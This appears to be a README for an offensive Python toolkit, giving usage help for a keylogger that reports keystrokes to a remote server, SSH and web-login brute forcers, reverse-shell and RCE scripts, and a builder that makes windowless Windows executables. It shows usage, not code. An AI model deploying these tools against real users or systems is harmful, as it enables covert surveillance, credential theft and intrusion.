A collection of Python-based penetration testing tools for various security testing scenarios.
- Subdomain Enumeration: DNS-based subdomain discovery with threading
- Keylogger: Captures keystrokes and sends them to a remote server
- Port Scanner: Scans for open ports and grabs service banners
- Web Crawler: Downloads JavaScript files from websites
- Brute Forcers: Web login and SSH brute forcing with threading
- Windows Executable Builder: Creates standalone Windows executables
pip install -r requirements.txtCreate a requirements.txt file with:
requests
paramiko
pyfiglet
bs4
keyboard
dnspython
pyinstaller
Uses DNS requests to enumerate potential subdomains with threading support.
python subdomains.py example.com -w wordlist.txt -t 20Captures keystrokes and sends them to a remote server. Can run in client or server mode.
Server Mode:
python keylogger.py server --type http --port 8080Client Mode:
python keylogger.py client --url http://server-ip:8080Scans for open ports and grabs service banners with threading support.
python portscanner.py 192.168.1.1 -r 1-1000 -t 100Crawls websites and downloads JavaScript library files.
python filedownloader.py crawl https://example.com --js --depth 3Web login and SSH brute forcing with threading support.
Web Login:
python bruteforce.py http://target.com/login -u admin -P passwords.txt -t 20SSH:
python sshbruteforce.py 192.168.1.1 -u root -P passwords.txt -t 10Creates standalone Windows executables for all tools.
python build_exe.py allusage: subdomains.py [-h] [-w WORDLIST] [-t THREADS] domain
DNS-based subdomain scanner with threading
positional arguments:
domain Target domain to scan (e.g., example.com)
optional arguments:
-h, --help show this help message and exit
-w WORDLIST, --wordlist WORDLIST
Path to wordlist file (default: subdomains.txt)
-t THREADS, --threads THREADS
Number of threads to use (default: 10)
usage: keylogger.py {client,server} ...
Keylogger with remote reporting capabilities
positional arguments:
{client,server} Operating mode
client Run as keylogger client
server Run as keylogger server
optional arguments:
-h, --help show this help message and exit
Client Mode:
usage: keylogger.py client [-h] [--url URL] [--ip IP] [--port PORT]
[--interval INTERVAL] [--log LOG]
optional arguments:
-h, --help show this help message and exit
--url URL Server URL for HTTP reporting (e.g., http://example.com:8080)
--ip IP Server IP for socket reporting
--port PORT Server port for socket reporting
--interval INTERVAL Reporting interval in seconds (default: 60)
--log LOG Local log file (default: keylog.txt)
Server Mode:
usage: keylogger.py server [-h] [--type {http,socket}] [--host HOST]
[--port PORT] [--log LOG]
optional arguments:
-h, --help show this help message and exit
--type {http,socket} Server type (default: http)
--host HOST Host to bind server to (default: 0.0.0.0)
--port PORT Port to bind server to (default: 8080)
--log LOG Server log file (default: server_keylog.txt)
usage: portscanner.py [-h] [-p PORTS | -r RANGE | -a] [-t THREADS]
[--timeout TIMEOUT]
target
Port scanner with banner grabbing
positional arguments:
target Target IP address
optional arguments:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Specific ports to scan (comma-separated)
-r RANGE, --range RANGE
Port range to scan (start-end)
-a, --all Scan all ports (1-65535)
-t THREADS, --threads THREADS
Number of threads (default: 100)
--timeout TIMEOUT Connection timeout in seconds (default: 1.0)
usage: filedownloader.py {download,crawl} ...
Web crawler and file downloader
positional arguments:
{download,crawl} Operating mode
download Download a single file
crawl Crawl a website and download files
optional arguments:
-h, --help show this help message and exit
Download Mode:
usage: filedownloader.py download [-h] [-o OUTPUT] url
positional arguments:
url URL of the file to download
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output file path
Crawl Mode:
usage: filedownloader.py crawl [-h] [-d DEPTH] [-t THREADS] [-o OUTPUT]
[--js] [--css] [--images]
url
positional arguments:
url Starting URL to crawl
optional arguments:
-h, --help show this help message and exit
-d DEPTH, --depth DEPTH
Maximum crawl depth (default: 2)
-t THREADS, --threads THREADS
Number of threads (default: 5)
-o OUTPUT, --output OUTPUT
Output directory (default: downloads)
--js Download JavaScript files (default: True)
--css Download CSS files
--images Download image files
usage: bruteforce.py [-h] [-u USERNAME] [-U USERLIST] [-p PASSWORD]
[-P PASSLIST] [-g GENERATE] [--user-field USER_FIELD]
[--pass-field PASS_FIELD] [--error ERROR]
[--success SUCCESS] [--method {GET,POST}] [-t THREADS]
[-q]
url
Threaded web login brute forcer
positional arguments:
url Target URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to use
-U USERLIST, --userlist USERLIST
File containing usernames
-p PASSWORD, --password PASSWORD
Password to use
-P PASSLIST, --passlist PASSLIST
File containing passwords
-g GENERATE, --generate GENERATE
Generate numeric passwords of specified length
--user-field USER_FIELD
Username form field name (default: username)
--pass-field PASS_FIELD
Password form field name (default: password)
--error ERROR Error message that appears on failed login (default: Invalid)
--success SUCCESS Success message that appears on successful login
--method {GET,POST} HTTP method (default: POST)
-t THREADS, --threads THREADS
Number of threads (default: 10)
-q, --quiet Quiet mode (less output)
usage: sshbruteforce.py [-h] [-p PORT] [-u USERNAME] [-U USERLIST] -P PASSLIST
[-t THREADS] [--timeout TIMEOUT] [-q]
target
Threaded SSH brute forcer
positional arguments:
target Target IP address or hostname
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT SSH port (default: 22)
-u USERNAME, --username USERNAME
Username to use
-U USERLIST, --userlist USERLIST
File containing usernames
-P PASSLIST, --passlist PASSLIST
File containing passwords
-t THREADS, --threads THREADS
Number of threads (default: 10)
--timeout TIMEOUT Connection timeout in seconds (default: 5)
-q, --quiet Quiet mode (less output)
usage: build_exe.py {single,all} ...
Build Windows executables from Python scripts
positional arguments:
{single,all} Build mode
single Build a single script
all Build all scripts in the repository
optional arguments:
-h, --help show this help message and exit
Single Mode:
usage: build_exe.py single [-h] [-o OUTPUT] [-i ICON] [--dir] [--no-console]
[-n NAME]
script
positional arguments:
script Path to Python script
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output directory (default: dist)
-i ICON, --icon ICON Path to icon file (.ico)
--dir Build as directory instead of single file
--no-console Hide console window
-n NAME, --name NAME Custom name for the executable
All Mode:
usage: build_exe.py all [-h] [-o OUTPUT] [-i ICON] [--dir] [--no-console]
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output directory (default: dist)
-i ICON, --icon ICON Path to icon file (.ico)
--dir Build as directory instead of single file
--no-console Hide console window
Network discovery using ARP requests:
python arp_scan.pyWeb directory enumeration tool:
python directory.py [URL]MD5 hash cracking tool:
python hashcracker.py- Interactive Shell:
python rce_interactive.py - Reverse Shell:
python rce_reverse_shell.py - Simple RCE Test:
python rce_whoami.py
Scans for SQLi and XSS vulnerabilities:
python scanner.py [URL]Exploits session-based vulnerabilities:
python session_exploit.pyThese tools are for educational purposes and authorized security testing only. Do not use them against systems you don't own or have explicit permission to test.